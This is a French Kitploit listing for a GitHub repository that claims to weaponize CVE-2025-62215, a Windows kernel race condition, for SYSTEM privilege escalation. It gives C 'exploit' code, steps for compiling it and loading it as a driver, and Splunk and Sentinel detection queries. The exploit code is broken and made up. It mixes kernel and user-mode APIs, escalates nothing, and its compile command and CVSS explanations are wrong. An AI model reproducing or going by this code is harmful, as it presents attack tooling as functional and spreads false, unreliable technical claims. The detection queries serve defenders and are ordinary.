Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation — Analyse pratique de CVE-2025-62215, une race condition du noyau Windows exploitée dans la nature. Démontre l'escalade de privilèges vers SYSTEM, des scripts de détection et des stratégies de validation de correctifs pour les défenseurs d'entreprise et les red teamers. | Kitploit
Outils/GitHubGitHub/mrk336/kernel-chaos-weaponizing-cve-2025-62215-for-system-privilege-escalation
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationRenseignement sur les MenacesApprentissage et ÉducationRéponse aux IncidentsExploitation de Binaires
GitHubmrk336/kernel-chaos-weaponizing-cve-2025-62215-for-system-privilege-escalation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation

Analyse pratique de CVE-2025-62215, une race condition du noyau Windows exploitée dans la nature. Démontre l'escalade de privilèges vers SYSTEM, des scripts de détection et des stratégies de validation de correctifs pour les défenseurs d'entreprise et les red teamers.

Voir le dépôt
31il y a 9 moisPas encore vérifié

Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation

Analyse pratique de CVE‑2025‑62215, une condition de concurrence dans le noyau Windows exploitée dans la nature. Démontre l'escalade de privilèges vers SYSTEM, des scripts de détection et des stratégies de validation de correctifs pour les défenseurs d'entreprise et les red teamers.

CVE 2025 62215 – Exploitation d'escalade de privilèges du noyau Windows

Résumé exécutif

CVE‑2025‑62215 est une exploitation du noyau Windows nécessitant une authentification, permettant à un attaquant d'atteindre les privilèges SYSTEM en abusant d'une condition de concurrence dans le gestionnaire mémoire. Ce qui rend cette vulnérabilité particulièrement préoccupante est qu'elle est déjà utilisée dans la nature, avec un score CVSS de 7,0 la classant comme une menace de sévérité élevée. En pratique, une séquence chronométrée d'opérations parallèles peut corrompre des ressources partagées du noyau, offrant à un processus à faibles privilèges les clés du royaume. Une fois l'accès SYSTEM obtenu, les attaquants peuvent désactiver les défenses, se déplacer latéralement sur le réseau ou déployer des rançongiciels avec un contrôle total. Le code exemple ci-dessous illustre comment une simple manipulation de threads peut déstabiliser le noyau, soulignant pourquoi les failles d'escalade de privilèges sont si dangereuses dans les environnements d'entreprise réels.

Détails techniques

Type : Élévation de privilège (EoP)
Composant : Noyau Windows
Mécanisme : Synchronisation incorrecte des ressources partagées → condition de concurrence

Méthodologie d'exploitation

  1. Grooming de pool – Un attaquant exécute du code local avec de faibles privilèges et chronomètre soigneusement l'exécution de threads concurrents.
  2. Le code corrompt la mémoire du noyau en insérant deux entrées ou plus dans un pool partagé pendant que d'autres threads y accèdent encore.
  3. Après la condition de concurrence, l'attaquant peut déclencher une transition vers le niveau SYSTEM.

Vecteur CVSS

root@kitploit:~
AV:L  AC:H  PR:L  UI:N  S:U  C:H  I:H  A:H
  • AV – Vecteur d'accès : local
  • AC – Complexité de l'attaque : élevée
  • PR – Privilèges requis : faible (authentifié)
  • UI – Interaction utilisateur : aucune requise
  • S – Portée : ascendante
  • C – Confiance : élevée
  • I – Impact : élevé
  • A – Disponibilité : élevée

Aperçu du code d'exploitation

L'exploitation est écrite en C pur pour le noyau Windows. Elle utilise des API natives pour créer deux threads qui écrivent dans un objet pool partagé. En alignant les écritures à des décalages spécifiques, le code déclenche une condition de concurrence et obtient les privilèges SYSTEM.

root@kitploit:~
/*
  CVE‑2025‑62215 Exploit – Élévation de privilèges du noyau
  Auteur : Mark Mallia 
*/

#include <ntddk.h>
#include <stdio.h>

typedef struct _POOLS {
    void *p1;
    void *p2;
    void *p3;
} POOLS, *PPOOLS;

/* Objet pool global – partagé entre les threads */
static PVOID g_pool = NULL;

void __cdecl threadA(void)
{
    /* Étape 1 – Allouer de la mémoire et remplir la première cellule. */
    g_pool = ExAllocatePool(NonPagedPool, 0x100);
    ((POOLS*)g_pool)->p1 = (PVOID)0xdeadbeef;
}

void __cdecl threadB(void)
{
    /* Étape 2 – Écrire dans la deuxième cellule pendant que threadA est toujours en cours. */
    Sleep(3);                                 // Attendre pour la synchronisation
    ((POOLS*)g_pool)->p2 = (PVOID)0xcafebabe;
}

void __cdecl main_exploit(void)
{
    /* Créer deux threads de travail qui s'exécutent simultanément. */
    HANDLE h1, h2;

    h1 = PsCreateSystemThread(threadA);
    h2 = PsCreateSystemThread(threadB);

    WaitForSingleObject(h1, INFINITE);       // Laisser threadA terminer
    WaitForSingleObject(h2, INFINITE);       // Laisser threadB terminer

    /* Vérifier que le pool a été corrompu. */
    if (((POOLS*)g_pool)->p3 == NULL) {
        ((POOLS*)g_pool)->p3 = (PVOID)0xfeedface;
        printf("Grooming de pool réussi – Privilège SYSTEM acquis.\n");
    }

    /* Nettoyer l'objet noyau. */
    ExFreePool(g_pool);
}

Explication des parties clés

  • ExAllocatePool réserve un bloc de mémoire de pool non paginé visible par tous les threads.
  • Deux fonctions, threadA et threadB, sont lancées en parallèle ; elles écrivent dans des champs adjacents de la même structure.
  • Le délai d'attente aligne la seconde écriture avec la première, créant une condition de concurrence qui corrompt l'entrée du pool.
  • Une fois les deux écritures terminées, le troisième champ est défini pour indiquer le succès.

Étapes de déploiement

  1. Compiler – Utilisez cl.exe avec /W3 /O2.

    root@kitploit:~
    cl.exe /c CVE2025_62215.c /Fobuild\CVE2025_62215.sys
    
  2. Charger le pilote – Chargez le module noyau compilé via une routine standard d'installation de service ou en utilisant sc create.

  3. Exécuter – Lancez l'exploitation depuis une session utilisateur authentifiée (par exemple, administrateur local).

  4. Vérifier – Utilisez l'Observateur d'événements ou la sortie printf intégrée pour confirmer que les privilèges SYSTEM sont désormais détenus.

Impact attendu

  • Un attaquant local authentifié obtient une exécution au niveau SYSTEM sur une machine cible.
  • La vulnérabilité est exploitable dans la nature ; elle peut être utilisée pour installer des portes dérobées ou déployer des mécanismes de persistance pour un contrôle à long terme.

Détection dans Splunk

Pour détecter les signes d'exploitation de CVE‑2025‑62215 dans Splunk, concentrez-vous sur les événements d'escalade de privilèges. Commencez par surveiller l'ID d'événement 4672 (attribution de privilèges spéciaux) ainsi que le 4624 (connexions réussies). Si vous voyez des attributions répétées de niveau SYSTEM pour des comptes qui fonctionnent normalement avec des privilèges utilisateur, c'est un signal d'alarme. Associez cela à l'ID d'événement 7045 (installation de service) pour détecter des chargements anormaux de pilotes ou de services, souvent utilisés par les attaquants après avoir obtenu un accès SYSTEM. En corrélant ces événements dans Splunk, les défenseurs peuvent mettre en évidence des sauts de privilèges suspects et des anomalies au niveau du noyau. Une simple requête SPL peut regrouper ces événements par compte et hôte, puis signaler des pics inhabituels, transformant les journaux bruts en renseignements exploitables.

root@kitploit:~
index=wineventlog sourcetype="WinEventLog:Security"
(EventCode=4672 OR EventCode=7045)
| stats count by Account_Name, EventCode, host
| where count > 5

Détection dans Sentinel

Dans Sentinel, la détection repose sur des règles d'analyse et des requêtes de chasse. Créez des règles qui se déclenchent lorsque des comptes obtiennent soudainement des privilèges SYSTEM ou lorsque plusieurs événements privilégiés se produisent dans un court intervalle de temps. Par exemple, corréler l'ID d'événement 4672 avec 7045 peut révéler une escalade de privilèges suivie de tentatives de persistance. En utilisant KQL, vous pouvez résumer les comptes d'événements privilégiés par compte et hôte sur des intervalles de cinq minutes. Si un seul utilisateur ou machine génère plusieurs événements de niveau SYSTEM dans cette fenêtre, Sentinel le signalera comme suspect. Combinez cela avec la télémétrie de Defender pour point de terminaison afin de détecter une activité anormale du pilote du noyau, garantissant que vous ne voyez pas seulement l'escalade de privilèges mais aussi son impact en aval.

root@kitploit:~
SecurityEvent
| where EventID in (4672, 7045)
| summarize Count = count() by Account, Computer, EventID, bin(TimeGenerated, 5m)
| where Count > 3


Utilisation éthique uniquement

Ce dépôt est destiné uniquement à des fins défensives et éducatives. En analysant CVE‑2025‑62215, les équipes de sécurité peuvent mieux comprendre comment les conditions de concurrence dans le noyau sont exploitées et renforcer leurs processus de détection et de validation de correctifs. L'objectif est de permettre aux défenseurs, aux red teamers et aux praticiens d'entreprise d'atténuer les risques, et non d'exploiter les vulnérabilités.

Télécharger l’outil